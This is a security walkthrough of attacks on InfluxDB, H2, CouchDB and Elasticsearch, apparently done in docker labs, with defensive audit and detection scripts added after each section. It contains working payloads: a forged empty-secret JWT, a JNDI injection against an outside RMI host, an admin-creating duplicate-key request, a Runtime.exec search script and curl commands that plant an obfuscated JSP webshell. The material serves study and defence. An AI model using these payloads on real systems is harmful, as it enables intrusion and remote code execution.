I. InfluxDB - Unauthorized Access - Improper JWT Validation
Default ports: 8086, 8088
InfluxDB is a well-known time-series database that uses JWT for authentication. When authentication is enabled but the shared-secret parameter has not been set, the JWT signing key is the empty string, so an attacker can forge a token for any user and execute SQL statements in InfluxDB.
1. Generate a JWT token with https://jwt.io/:
{
"alg": "HS256",
"typ": "JWT"
}
{
"username": "admin",
"exp": 1676346267
}
Set up the environment with docker.
Access http://192.168.153.132:8086/debug/vars
![](https://img.laitimes.com/img/__Qf2AjLwojIjJCLyojI0JCLicmbw5SM4gTN3EjM0ADMlhjM1MjNiVTNjNTZjNDMlJzNhFWOi9CX0JXZ252bj91Ztl2Lc52YucWbp5GZzNmLn9Gbi1yZtl2Lc9CX6MHc0RHaiojIsJye.png)
Capture the request with Burp and add the JWT built from the JSON above; the exp claim ("exp": 1676346267) must be later than the current time.
POST /query HTTP/1.1
Host: 192.168.153.132:8086
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwiZXhwIjoxNjc2MzQ2MjY3fQ.NPhb55F0tpsp5X5vcN_IkAAGDfNzV5BA6M4AThhxz6A
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 22
db=sample&q=show users
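The root cause above is that an HS256 verifier keyed with the empty string accepts any token whose signature was also computed with the empty string. The following example is added here and is not InfluxDB's code; it re-implements the check in plain Python (no PyJWT dependency) so the behaviour can be seen side by side: `verify_hs256` is the naive verifier that accepts an empty secret, `hardened_verify` refuses to operate until a secret is configured, and `token_verifies_under_empty_secret` is a detection helper a defender can run over captured Authorization headers. `mint_hs256` only exists to produce test input; the claims and secret values in the demo are constructed.

```python
import base64
import hashlib
import hmac
import json
import time


def _b64url(raw):
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode()


def _b64url_decode(text):
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def mint_hs256(claims, secret):
    # Builds the same kind of token jwt.io produces; used here only to create test input.
    header = _b64url(json.dumps({"alg": "HS256", "typ": "JWT"}, separators=(",", ":")).encode())
    payload = _b64url(json.dumps(claims, separators=(",", ":")).encode())
    sig = hmac.new(secret.encode(), f"{header}.{payload}".encode(), hashlib.sha256).digest()
    return f"{header}.{payload}.{_b64url(sig)}"


def _signature_ok(token, secret):
    # Returns the decoded claims when the HS256 signature matches `secret`, else None.
    try:
        h, p, s = token.split(".")
        header = json.loads(_b64url_decode(h))
        claims = json.loads(_b64url_decode(p))
        given = _b64url_decode(s)
    except ValueError:  # wrong segment count, bad base64 or bad JSON
        return None
    if header.get("alg") != "HS256":  # never accept alg=none or a swapped algorithm
        return None
    expected = hmac.new(secret.encode(), f"{h}.{p}".encode(), hashlib.sha256).digest()
    return claims if hmac.compare_digest(expected, given) else None


def verify_hs256(token, secret, now=None):
    """Naive verifier: checks signature and expiry only, so an empty `secret` works.
    This is the behaviour the section above describes for a missing shared-secret."""
    claims = _signature_ok(token, secret)
    if claims is None:
        return None
    now = int(time.time()) if now is None else now
    if not isinstance(claims.get("exp"), int) or claims["exp"] <= now:  # exp is mandatory
        return None
    return claims


def hardened_verify(token, secret, now=None):
    """Same checks, but refuses every token while no shared secret is configured."""
    if not secret:
        return None
    return verify_hs256(token, secret, now)


def token_verifies_under_empty_secret(token):
    """Detection helper for captured Authorization: Bearer tokens: one that validates
    under the empty key was either forged or issued by a misconfigured server."""
    return _signature_ok(token, "") is not None


if __name__ == "__main__":
    demo = mint_hs256({"username": "admin", "exp": 1676346267}, "")  # constructed token
    print("naive verifier accepts:", verify_hs256(demo, "", now=1676000000))
    print("hardened verifier accepts:", hardened_verify(demo, "", now=1676000000))
    print("verifies under empty secret:", token_verifies_under_empty_secret(demo))
```

The operational fix is simply to set shared-secret to a long random value; the detection helper is useful when reviewing proxy or access logs of an instance that may have run without one.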
II. H2 Database - Unauthorized Access - Misconfiguration
Default port: 20051
H2 Database is a Java in-memory database, mostly used for unit tests. It ships with a web management console; in Spring development, setting the following options allows external users to access the web console without any authentication:
spring.h2.console.enabled=true
spring.h2.console.settings.web-allow-others=true
Through this console we can perform a JNDI injection attack and then execute arbitrary commands in the target environment.
1. Download JNDI-Injection-Exploit
https://github.com/welk1n/JNDI-Injection-Exploit
2. Generate the RMI payload URL
-C: command to execute, -A: server address
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C touch /tmp/success -A 47.94.236.117
3. Enter the URL in the console and submit
javax.naming.InitialContext
rmi://47.94.236.117:1099/kd1rns
Set up the target with docker and access http://192.168.153.132:8080/h2-console/login.jsp?jsessionid=f49af99d4d6641c0c9d6573f3fd57c55
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C touch /tmp/success -A 192.168.153.129
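Two defensive checks follow from this section: the exposure comes from the two Spring properties above, and the abuse shows up in the console login form as a driver class of javax.naming.InitialContext with an rmi:// (or ldap://) URL instead of a JDBC URL. The example below is added here and is not part of the page or of H2/Spring; it audits a properties file for the risky combination and flags console login parameters that are JNDI lookups. The sample configurations are constructed, and the scheme list in `JNDI_URL` is the author's assumption about which lookup schemes to treat as suspicious.

```python
import re

H2_ENABLED = "spring.h2.console.enabled"
H2_ALLOW_OTHERS = "spring.h2.console.settings.web-allow-others"
# URL schemes that mean "JNDI lookup", not "JDBC connection" (assumed list)
JNDI_URL = re.compile(r"^\s*(rmi|ldap|ldaps|iiop|dns)://", re.IGNORECASE)


def parse_properties(text):
    """Minimal Java .properties reader: key=value per line, '#' or '!' starts a comment."""
    props = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line[0] in "#!":
            continue
        key, sep, value = line.partition("=")
        if sep:
            props[key.strip()] = value.strip()
    return props


def audit_h2_console(properties_text):
    """Return human-readable findings for the H2 console settings in a Spring properties file."""
    props = parse_properties(properties_text)
    enabled = props.get(H2_ENABLED, "false").lower() == "true"
    allow_others = props.get(H2_ALLOW_OTHERS, "false").lower() == "true"
    findings = []
    if enabled:
        findings.append(f"{H2_ENABLED}=true: the console should be off outside local development")
    if enabled and allow_others:
        findings.append(f"{H2_ALLOW_OTHERS}=true: the console is reachable from other hosts with no authentication")
    return findings


def is_jndi_console_login(driver_class, jdbc_url):
    """Flag a console login whose driver/URL pair is a JNDI lookup rather than a JDBC driver."""
    return driver_class.strip() == "javax.naming.InitialContext" or bool(JNDI_URL.match(jdbc_url))


# Constructed sample configurations (not taken from any real project)
WEAK_CONFIG = """
# application.properties as used in the lab
spring.h2.console.enabled=true
spring.h2.console.settings.web-allow-others=true
"""
FIXED_CONFIG = """
spring.h2.console.enabled=false
spring.h2.console.settings.web-allow-others=false
"""

if __name__ == "__main__":
    for finding in audit_h2_console(WEAK_CONFIG):
        print("finding:", finding)
    print("fixed config findings:", audit_h2_console(FIXED_CONFIG))
    print("JNDI login:", is_jndi_console_login("javax.naming.InitialContext", "rmi://127.0.0.1:1099/obj"))
```

`audit_h2_console` is meant to run in CI over every application*.properties file; `is_jndi_console_login` can be applied to the driver and url form fields recorded by a reverse proxy in front of /h2-console.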
III. CouchDB - Privilege Bypass combined with RCE
Default port: 5984
Apache CouchDB is an open-source database focused on ease of use and on being "a database that fully embraces the web". It is a NoSQL database that uses JSON as its storage format, JavaScript as its query language, and MapReduce and HTTP as its API. It is widely deployed: the BBC uses it in its dynamic content platform, Credit Suisse in the market framework of its internal commodities department, and Meebo in its social platform (web and applications).
- CouchDB privilege bypass - CVE-2017-12635
1. First create the user
Request to /_users/org.couchdb.user:vulhub with the body:
{
"type": "user",
"name": "vulhub",
"roles": ["_admin"],
"roles": [],
"password": "vulhub"
}
2. Log in as the user to confirm the privileges
GET /_utils/
Username / password: vulhub / vulhub
First request
PUT /_users/org.couchdb.user:vulhub HTTP/1.1
Host: your-ip:5984
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/json
Content-Length: 90
{
"type": "user",
"name": "vulhub",
"roles": ["_admin"],
"password": "vulhub"
}
Second request
PUT /_users/org.couchdb.user:vulhub HTTP/1.1
Host: your-ip:5984
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/json
Content-Length: 108
{
"type": "user",
"name": "vulhub",
"roles": ["_admin"],
"roles": [],
"password": "vulhub"
}
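The difference between the two requests above is the repeated "roles" key: CouchDB's Erlang-side JSON handling effectively used the first value (["_admin"]) while the JavaScript validation function saw the last one ([]), so the document passed validation yet was stored with admin roles. The example below is added here and is not CouchDB's code; it reproduces both parsing behaviours with Python's `json` module and shows the defensive rule that closes the gap: refuse any document containing duplicate keys before evaluating anything else. `validate_user_doc` and its `requester_is_admin` parameter are the author's own simplified stand-in for the _users validation, and the clean document in the demo is constructed.

```python
import json

# The second request body from the section above, with "roles" given twice
DUPLICATE_ROLES_BODY = """{
  "type": "user",
  "name": "vulhub",
  "roles": ["_admin"],
  "roles": [],
  "password": "vulhub"
}"""


def first_key_wins(pairs):
    obj = {}
    for key, value in pairs:
        obj.setdefault(key, value)  # keep the first occurrence, ignore later ones
    return obj


def parse_like_erlang_side(body):
    """Keep the first value of a repeated key (the storage side in CVE-2017-12635)."""
    return json.loads(body, object_pairs_hook=first_key_wins)


def parse_like_js(body):
    """Keep the last value of a repeated key, as JSON.parse does (the validation side)."""
    return json.loads(body)


def duplicate_keys(body):
    """List every key that appears more than once in any object of the document."""
    dupes = []

    def hook(pairs):
        seen = set()
        for key, _ in pairs:
            if key in seen and key not in dupes:
                dupes.append(key)
            seen.add(key)
        return dict(pairs)

    json.loads(body, object_pairs_hook=hook)
    return dupes


def validate_user_doc(body, requester_is_admin=False):
    """Return (accepted, reason). Duplicate keys are rejected before any other rule,
    so the two parsers can only ever disagree about a document that was already refused."""
    try:
        dupes = duplicate_keys(body)
    except ValueError as exc:
        return False, f"invalid JSON: {exc}"
    if dupes:
        return False, f"duplicate key(s): {', '.join(dupes)}"
    doc = parse_like_js(body)
    if doc.get("type") != "user":
        return False, "doc.type must be 'user'"
    if doc.get("roles") and not requester_is_admin:
        return False, "only _admin may set roles"
    return True, "ok"


if __name__ == "__main__":
    print("first-wins roles:", parse_like_erlang_side(DUPLICATE_ROLES_BODY)["roles"])
    print("last-wins roles: ", parse_like_js(DUPLICATE_ROLES_BODY)["roles"])
    print("validation:", validate_user_doc(DUPLICATE_ROLES_BODY))
    clean = '{"type": "user", "name": "vulhub", "roles": [], "password": "vulhub"}'  # constructed
    print("clean doc:", validate_user_doc(clean))
```

The same `duplicate_keys` check is a cheap guard for any service that feeds one JSON body to two different parsers (gateway and backend, validator and store), which is the general shape of this bug class.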
- CouchDB privilege bypass to RCE - CVE-2017-12636
1. Download exp.py
2. Change the target and the reverse-shell address
3. Run it with Python3
https://github.com/vulhub/vulhub/blob/master/couchdb/CVE-2017-12636/exp.py
IV. Elasticsearch - File Write & RCE
Default ports: 9200, 9300
- Elasticsearch RCE CVE-2014-3120
1. The vulnerability requires at least one document in ES, so first create one
POST /website/blog/ HTTP/1.1
Host: your-ip:9200
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 25
{
"name": "xiaodi"
}
2. Send the request directly to trigger command execution
POST /_search?pretty HTTP/1.1
Host: your-ip:9200
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 343
{
"size": 1,
"query": {
"filtered": {
"query": {
"match_all": {
}
}
}
},
"script_fields": {
"command": {
"script": "import java.io.*;new java.util.Scanner(Runtime.getRuntime().exec(\"id\").getInputStream()).useDelimiter(\"\\\\A\").next();"
}
}
}
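CVE-2014-3120 is dynamic scripting in script_fields: the script string above is ordinary Java that reaches Runtime.exec. The configuration fix for affected 1.x versions is script.disable_dynamic: true (or upgrading), but a defender also wants to see such requests in traffic. The example below is added here and is not Elasticsearch's code; it walks a parsed _search body, collects every script, and reports the ones carrying JVM command-execution indicators. The indicator list is the author's assumption, the RCE_BODY fixture is the request body from step 2 above, and BENIGN_BODY is a constructed scoring script for comparison. It goes slightly beyond the page by also accepting the object form of a script ({"script": {"inline": ...}}), whose field names are assumed.

```python
import json

# Strings that rarely appear in a legitimate scoring script but do in JVM command execution
INDICATORS = ("Runtime.getRuntime", "ProcessBuilder", "java.io.", "java.lang.reflect",
              "Class.forName", ".exec(")


def find_scripts(node, path="$"):
    """Walk a parsed request body and collect (json_path, script_text) for every script."""
    found = []
    if isinstance(node, dict):
        for key, value in node.items():
            child = f"{path}.{key}"
            if key == "script" and isinstance(value, str):
                found.append((child, value))
            elif key == "script" and isinstance(value, dict):
                # object form, e.g. {"script": {"inline": "..."}} (assumed field names)
                for field in ("inline", "source"):
                    if isinstance(value.get(field), str):
                        found.append((f"{child}.{field}", value[field]))
            else:
                found.extend(find_scripts(value, child))
    elif isinstance(node, list):
        for i, value in enumerate(node):
            found.extend(find_scripts(value, f"{path}[{i}]"))
    return found


def inspect_search_body(raw_body):
    """Return one record per script that carries command-execution indicators."""
    try:
        body = json.loads(raw_body)
    except ValueError:
        return []  # not JSON: nothing to inspect here
    hits = []
    for path, script in find_scripts(body):
        indicators = [i for i in INDICATORS if i in script]
        if indicators:
            hits.append({"path": path, "indicators": indicators, "script": script})
    return hits


# The request body from step 2 above, copied here as a test fixture
RCE_BODY = r'''{
  "size": 1,
  "query": {"filtered": {"query": {"match_all": {}}}},
  "script_fields": {
    "command": {
      "script": "import java.io.*;new java.util.Scanner(Runtime.getRuntime().exec(\"id\").getInputStream()).useDelimiter(\"\\\\A\").next();"
    }
  }
}'''

# A harmless scoring script for comparison (constructed)
BENIGN_BODY = '{"query": {"match_all": {}}, "script_fields": {"double_price": {"script": "doc[\'price\'].value * 2"}}}'

if __name__ == "__main__":
    for hit in inspect_search_body(RCE_BODY):
        print(hit["path"], "->", hit["indicators"])
    print("benign body hits:", inspect_search_body(BENIGN_BODY))
```

Running this over the bodies of POST /_search requests recorded by a proxy or a packet capture gives a simple detection; the JSON path in each hit tells the analyst exactly which field carried the script.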
- Elasticsearch file write (wooyun_2015_110216)
9200 is the usual Elasticsearch port; this vulnerability environment has to be combined with a middleware (here Tomcat)
1. Port 9200 exposes an Elasticsearch page and port 8080 exposes a Tomcat directory
2. Use Elasticsearch to write a backdoor into /usr/local/tomcat/webapps/wwwroot/
curl -XPOST http://123.58.236.76:31556/yz.jsp/yz.jsp/1 -d'
{"<%new java.io.RandomAccessFile(application.getRealPath(new String(new byte[]{47,116,101,115,116,46,106,115,112})),new String(new byte[]{114,119})).write(request.getParameter(new String(new byte[]{102})).getBytes());%>":"test"}
'
curl -XPUT 'http://123.58.236.76:31556/_snapshot/yz.jsp' -d '{
"type": "fs",
"settings": {
"location": "/usr/local/tomcat/webapps/wwwroot/",
"compress": false
}
}'
curl -XPUT "http://123.58.236.76:31556/_snapshot/yz.jsp/yz.jsp" -d '{
"indices": "yz.jsp",
"ignore_unavailable": "true",
"include_global_state": false
}'
3. Access the snapshot-yz.jsp file on port 8080 to write the code into test.jsp
File-write URL: http://123.58.236.76:31557/wwwroot/indices/yz.jsp/snapshot-yz.jsp?f=success
Code display URL: http://123.58.236.76:31557/wwwroot/test.jsp
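Two things make the file write above possible: the fs repository may point at any directory the Elasticsearch process can write to (here Tomcat's webapps), and index, repository and snapshot names ending in .jsp turn the snapshot metadata files into web-executable files. Elasticsearch 1.6 and later restrict fs repositories to the directories listed in path.repo; the example below is added here and is not Elasticsearch's code. It audits a PUT /_snapshot/<name> body against a set of permitted repository roots and flags names with web-executable extensions. ALLOWED_REPO_ROOTS and WEB_EXTENSIONS are the author's assumptions, and the non-page bodies in the test are constructed.

```python
import os

ALLOWED_REPO_ROOTS = ["/var/lib/elasticsearch/repo"]  # assumed value of path.repo
WEB_EXTENSIONS = (".jsp", ".jspx", ".php", ".asp", ".aspx", ".war")  # assumed list


def _under(path, root):
    """True when `path` is `root` or lies somewhere below it."""
    path, root = os.path.abspath(path), os.path.abspath(root)
    return os.path.commonpath([path, root]) == root


def audit_fs_repository(repo_body, allowed_roots=ALLOWED_REPO_ROOTS):
    """Findings for a PUT /_snapshot/<name> body (the second curl above)."""
    if repo_body.get("type") != "fs":
        return []  # only filesystem repositories carry a local path
    location = repo_body.get("settings", {}).get("location")
    if not location:
        return ["fs repository registered without a location"]
    if not any(_under(location, root) for root in allowed_roots):
        return [f"location {location!r} is outside the permitted repository roots {allowed_roots}"]
    return []


def suspicious_names(*names):
    """Repository, snapshot or index names that end in a web-executable extension."""
    return [n for n in names if n.lower().endswith(WEB_EXTENSIONS)]


def audit_snapshot_request(repo_name, snapshot_name, body):
    """Name checks for a create-snapshot request like the third curl above."""
    indices = body.get("indices", "")
    if isinstance(indices, str):
        indices = [i for i in indices.split(",") if i]
    findings = []
    for name in suspicious_names(repo_name, snapshot_name, *indices):
        findings.append(f"name {name!r} would produce web-executable files on disk")
    return findings


if __name__ == "__main__":
    # The repository body from the curl -XPUT above
    page_repo = {"type": "fs", "settings": {"location": "/usr/local/tomcat/webapps/wwwroot/", "compress": False}}
    print(audit_fs_repository(page_repo))
    print(audit_snapshot_request("yz.jsp", "yz.jsp", {"indices": "yz.jsp"}))
    # A repository under the permitted root (constructed) produces no findings
    print(audit_fs_repository({"type": "fs", "settings": {"location": "/var/lib/elasticsearch/repo/nightly"}}))
```

In practice the location check belongs at the API boundary (a proxy in front of 9200, or the cluster's own path.repo setting), while the name check is a useful rule for reviewing snapshot activity in audit logs.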